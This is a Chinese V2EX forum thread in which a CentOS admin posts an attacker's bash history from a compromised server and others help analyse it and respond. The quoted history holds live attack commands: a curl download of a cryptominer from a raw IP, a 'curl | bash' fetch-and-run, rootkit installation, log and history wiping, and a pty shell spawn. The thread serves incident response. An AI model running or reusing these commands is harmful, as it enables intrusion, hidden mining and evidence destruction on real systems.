[求助] 系统中毒了,找到了进程和文件,无法杀死和删除

2022-12-02 16:30:34 +08:00
 quadrapop

直接进入主题

操作日志

1  export TERM=xterm
    2  top
    3  /usr/lib/sys/rcu_bj 
    4  cd /usr/lib/sys/
    5  ls
    6  chmod +x rcu_bj 
    7  ./rcu_bj 
    8  chattr -ia rcu_bj
    9  ./rcu_bj 
   10  cd /
   11  mkdir .a
   12  cd .a
   13  git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git
   14  cd hiding-cryptominers-linux-rootkit/
   15  ls
   16  make
   17  dmesg
   18  dmesg -C
   19  ls
   20  make
   21  ls
   22  make
   23  make
   24  cd ..
   25  rm -rf hiding-cryptominers-linux-rootkit/
   26  curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu
   27  ./rcu 
   28  top
   29  rm -rf /var/log/*
   30  cat /dev/null > ~/.bash_history
   31  id
   32  curl http://123.30.179.206:8189/solr/.v7/api | bash   
   33  ps auxw --sort=%cpu|tail -10
   34  lscpu
   35  ps auxw --sort=%cpu|tail -10
   36  ps auxw --sort=%cpu|tail -10
   37  ps auxw --sort=%cpu|tail -10
   38  ps aux | grep rcu
   39  python -c 'import pty; pty.spawn("/bin/bash")'

帮忙解读下这段脚本都干嘛了-_-

https://github.com/alfonmga/hiding-cryptominers-linux-rootkit

下载的这个脚本看用途是用来隐藏文件夹和进程的

3 个可疑文件看起来没有隐藏文件属性,但是无法删除

[root@localhost profile.d]# cd /usr/lib/sys
[root@localhost sys]# ll
总用量 8
-rwxr-x--x 1 root confluence    0 12 月  1 18:38 rcu_bj
-rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk
-rwxrwx--- 1 root root       1199 11 月 14 11:01 rcu_udev
-rwxr-x--- 1 root confluence    0 11 月 14 18:02 systemd
[root@localhost sys]# lsattr rcu_bj
---------------- rcu_bj
您在 /var/spool/mail/root 中有邮件
[root@localhost sys]# lsattr rcu_libk
---------------- rcu_libk
[root@localhost sys]# lsattr rcu_undev
lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时
[root@localhost sys]# lsattr rcu_udev
---------------- rcu_udev

进程也杀不死

[root@localhost sys]# ps -ef|grep rcu
root          8      2  0 4 月 13 ?       00:00:06 [rcu_bh]
root          9      2  0 4 月 13 ?       22:01:59 [rcu_sched]
root     168224 243031  0 16:28 pts/24   00:00:00 grep --color=auto rcu

各位大佬接下来应该怎么办呀

2005 次点击
所在节点    CentOS
8 条回复
dier
2022-12-02 17:46:15 +08:00
检查一下 alias 有没有配置陌生的别名
试试修改这个文件的权限
检查一下 crontab
尝试编辑随便编辑文件内容或修改文件名

看能不能阻止自动启动
quadrapop
2022-12-02 17:56:59 +08:00
@dier alias 和调度器都看起来正常。
脚本中的 http://1.234.16.54:7070/apiapi/api/raw/master/s.zip
我下下来有差不多 6M ,但是文件是损坏的
Nitroethane
2022-12-02 19:40:04 +08:00
首先不确定你给出的 bash 历史记录是否是完整的,因为 "/usr/lib/sys/rcu_bj" 这个文件像是攻击者植入的,默认系统没有这个文件。
从 GitHub 克隆的这个项目的用途是使用内核模块隐藏挖矿木马的进程信息和 CPU 使用率。
从 1.234.16.54 这个网站下载的 s.zip 不是压缩文件,是一个 ELF ,把 sha256 扔到 virustotal 上发现它是一个挖矿木马。
至于请求 123.30.179.206 这个 URL ,我手动访问了下,返回是 404 ,看命令的话,正常情况应该是一个 shell 脚本,猜测可能是做横向移动用的。

首先你得确认攻击者是从什么入口进来的,通过对公网开放的端口大致可以确定。然后搞清楚攻击者通过这个入口进来后拿到的是什么权限,如果是 root 的话可以考虑备份重要数据然后重装了。不过还是得确定从什么入口进来,要把相应的漏洞修复,否则以后还会中招。
Nitroethane
2022-12-02 19:42:26 +08:00
至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。
cxh116
2022-12-02 19:51:07 +08:00
这种情况应该第一时间关机.

再 u 盘启动,备份数据.防止重要数据被删除或加密了.到时怕交 BTC 也拿不回.
之后再 chroot 修,或直接重装,再把数据拷进去.
quadrapop
2022-12-05 14:14:37 +08:00
@Nitroethane
操作记录只有这么多了,这一段脚本中应该是把日志删除了
这个 rootkit 可以隐藏进程和 cpu 使用率,我搜了下,没找到怎么把隐藏的给显示出来。
现在也不太确定时候从哪个端口进来的,外网几个映射端口已经关掉了-_-
就是这 2 个进程也不知道应该怎么办。
Nitroethane
2022-12-05 16:00:09 +08:00
@quadrapop

注意看我的回复:至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。

通过 /usr/lib/sys 目录下那两个挖矿木马的文件属性判断,应该是通过 confluence 的漏洞进来的。前段时间 confluence 爆出过好几个高危漏洞,赶紧升级下吧。
Nitroethane
2022-12-05 16:02:26 +08:00
你贴出来的这些权限维持操作不是同一个人做的,这台服务器应该是像公交车一样,被很多人上了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/899648

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX